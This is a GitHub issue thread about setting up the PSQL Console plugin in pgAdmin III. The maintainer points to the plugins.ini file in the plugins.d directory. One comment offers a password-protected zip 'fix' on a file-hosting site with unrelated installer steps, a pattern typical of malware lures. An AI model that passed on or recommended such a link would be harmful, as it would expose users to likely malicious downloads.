### ISSUE TITLE
How to set PSQL Console as plugin?

### ISSUE THREAD

**Issue by tokorhon** [levinsv/pgadmin3#45]
I have set PG bin path under File | Options | Browser | Binary path. Still the Plugins dropdown menu has only disabled option "No plugins installed". How can I set PSQL Console to work as plugin?

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tokorhon** [comment]
Thanks! What does this fix do?

**Comment by levinsv** [comment]
The standard pgadmin3 installation has a plugins.d directory where the plugins.ini file describes how to use plugins.

**Comment by tokorhon** [comment]
Thanks! This works.

Can I override the PG bin path stored in Windows registry in settings.ini file? I have several versions of PgAdmin III which should use different versions of psql.

**Comment by levinsv** [comment]
I don't know. But this is unlikely.
